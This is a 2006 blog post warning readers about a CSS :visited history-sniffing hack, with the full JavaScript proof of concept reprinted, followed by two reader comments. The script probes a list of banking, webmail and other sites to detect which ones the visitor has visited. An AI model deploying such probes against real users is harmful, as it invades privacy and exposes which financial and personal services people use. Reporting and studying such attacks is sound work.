People Can Steal Your Browser History : Watchout

Posted on August 24th, 2006 in Browsers, Security by Abhinav Kaiser

Jeremiah Grossman tries to prove through a script that your browser history could be captured by websites that you visit. This is done through a CSS hack. This is the only time IE7 RC1 has been more secure than Firefox: IE7 blocks the script, whereas Firefox shows my entire history. The script is embedded on the page, and it appears that the basic technique involves setting the visited-link color via CSS on a group of links to common sites, then reading the computed style of each link and seeing which ones have the visited color. Check out the embedded code.


<script>

// Lower-case the User-Agent once so the substring test is case-insensitive.
var agent = navigator.userAgent.toLowerCase();
// Gate for the probe below: true when the UA string contains "mozilla".
// NOTE(review): most browsers' UA strings carry that token, not only
// Firefox's, so this does not single out one engine — confirm intent.
var is_mozilla = agent.indexOf("mozilla") >= 0;

// Candidate URLs whose visited state the page tests.
// Scope of the leak: the technique answers "has this exact URL been visited?"
// only for entries listed here; it cannot enumerate a visitor's history.
// Why it matters: the list mixes webmail, banking, payment and auction sites,
// so a positive match tells a hostile page which services a visitor uses.
// NOTE(review): "http://www.myspace.com/" is listed twice.
var websites = [
	"http://login.yahoo.com/",
	"http://www.jailbabes.com",
	"http://ha.ckers.org",
	"http://seoblackhat.com",
	"http://www.cgisecurity.com",
	"http://www.spidynamics.com",
	"http://www.cenzic.com",
	"http://www.watchfire.com",
	"http://www.ntobjectives.com",
	"http://www.webappsec.org",
	"http://www.whitehatsec.com",
	"http://english.aljazeera.net/HomePage",
	"http://mail.google.com/",
	"http://mail.yahoo.com/",
	"http://my.yahoo.com/",
	"http://slashdot.org/",
	"http://www.myspace.com/",
	"http://www.amazon.com/",
	"http://www.aol.com/",
	"http://www.bankofamerica.com/",
	"http://www.bankone.com/",
	"http://www.blackhat.com/",
	"http://www.blogger.com/",
	"http://www.bofa.com/",
	"http://www.capitalone.com/",
	"http://www.chase.com/",
	"http://www.citibank.com/",
	"http://www.cnn.com/",
	"http://www.comerica.com/",
	"http://www.e-gold.com/",
	"http://www.ebay.com/",
	"http://www.etrade.com/",
	"http://www.google.com/",
	"http://www.hsbc.com/",
	"http://www.icq.com/",
	"http://www.microsoft.com/",
	"http://www.msn.com/",
	"http://www.myspace.com/",
	"http://www.passport.net/",
	"http://www.paypal.com/",
	"http://www.sourceforge.net/",
	"http://www.statefarm.com/",
	"http://www.usbank.com/",
	"http://www.wachovia.com/",
	"http://www.wamu.com/",
	"http://www.wellsfargo.com/",
	"http://www.xanga.com/",
	"http://www.yahoo.com/",
	"https://commerce.blackhat.com/",
	"https:/banking.wellsfargo.com/",
];

/* One-time setup: build the page scaffolding and the per-link CSS rules, then
   run the probe. The 'xss_flag' div is a sentinel: if it already exists the
   whole block is skipped, so including the script twice does nothing. */
/* Defender context: current browsers defeat this approach. getComputedStyle()
   reports the unvisited style for links, and :visited rules may only change a
   small set of color properties, so the comparison made later never matches. */
if (! document.getElementById('xss_flag')) {
	
	// Sentinel element checked by the guard above.
	var d = document.createElement('div');
	d.id = 'xss_flag';
	document.body.appendChild(d);

	// `d` is reused (var is function/global scoped) for a layout table with
	// id 'data'. The table is appended here but not referenced again in the
	// visible code.
	// NOTE(review): the DOM properties are spelled cellPadding / cellSpacing;
	// the lowercase names below presumably have no effect — confirm.
	var d = document.createElement('table');
	d.border = 0;
	d.cellpadding = 5;
	d.cellspacing = 10;
	d.width = '90%';
	d.align = 'center';
	d.id = 'data';
	document.body.appendChild(d);
	
	// Emit one CSS rule per candidate URL: the link with id "idN" is colored
	// #0000FF only when the browser treats it as visited. stealHistory()
	// compares against the computed form of that color, "rgb(0, 0, 255)".
	// NOTE(review): document.write only appends while the page is still being
	// parsed; if this ran after load it would replace the document — confirm
	// where the script is included.
	document.write('<style>');
	for (var i = 0; i < websites.length; i++) {
		document.write('#id' + i + ":visited {color: #0000FF;}");
	}
	document.write('</style>');

	/* Run the probe only when the User-Agent check at the top passed. */

if (is_mozilla) {
stealHistory();	
}
	
}


/*--- [method: stealHistory] -------------------------------------------#
# Description: Test every URL in `websites` for the :visited marker      #
# color and list the matches in the current document.                    #
#                                                                        #
# For each entry a temporary <a id="idN"> is attached to <body>, its     #
# computed "color" is read, and the element is detached again. When the  #
# color equals "rgb(0, 0, 255)" the URL is written into the page as a    #
# list item. The visible code only writes to the current document; it    #
# does not send the result anywhere.                                     #
#                                                                        #
# Defender context: current browsers return the unvisited style from     #
# getComputedStyle() for links, so this comparison no longer reveals     #
# whether a URL was visited.                                             #
-----------------------------------------------------------------------*/
function stealHistory() {

	// Computed form of the color that the page's "#idN:visited" rules assign.
	var visitedColor = "rgb(0, 0, 255)";

	// Attach a throwaway anchor for entry `idx`, read its computed color,
	// then detach it so the probe leaves no element behind.
	function probeColor(idx) {
		var anchor = document.createElement("a");
		anchor.id = "id" + idx;
		anchor.href = websites[idx];
		anchor.innerHTML = websites[idx];

		document.body.appendChild(anchor);
		var computed = document.defaultView.getComputedStyle(anchor, null);
		var value = computed.getPropertyValue("color");
		document.body.removeChild(anchor);

		return value;
	}

	var idx = 0;
	while (idx < websites.length) {
		// A match means the browser styled this link as visited.
		if (probeColor(idx) == visitedColor) {
			var url = websites[idx];
			document.write('<li><a href="' + url + '">' + url + '</a></li>');
		}
		idx++;
	}

}

</script>

2 Responses to 'People Can Steal Your Browser History : Watchout'



  1. on August 25th, 2006 at 5:02 am

    People Can Steal Your Browser History : Watchout…

    This is a CSS hack embedded into a webpage that can retrieve your entire browsing history….

  2. KLB on techtagg.com said,

    on August 27th, 2006 at 11:47 am

    This is a very interesting hack. It isn’t really a security flaw as much as an incredibly creative way to misuse designed features. I wonder how it will be fixed in Firefox. The only thing I could think of is disabling JavaScript’s ability to see what color a link is.

    The thing is, it is really impractical to try to grab more than a limited number of specific URLs; they can't see the URL of any page that they didn't specifically create a link to in the first place.
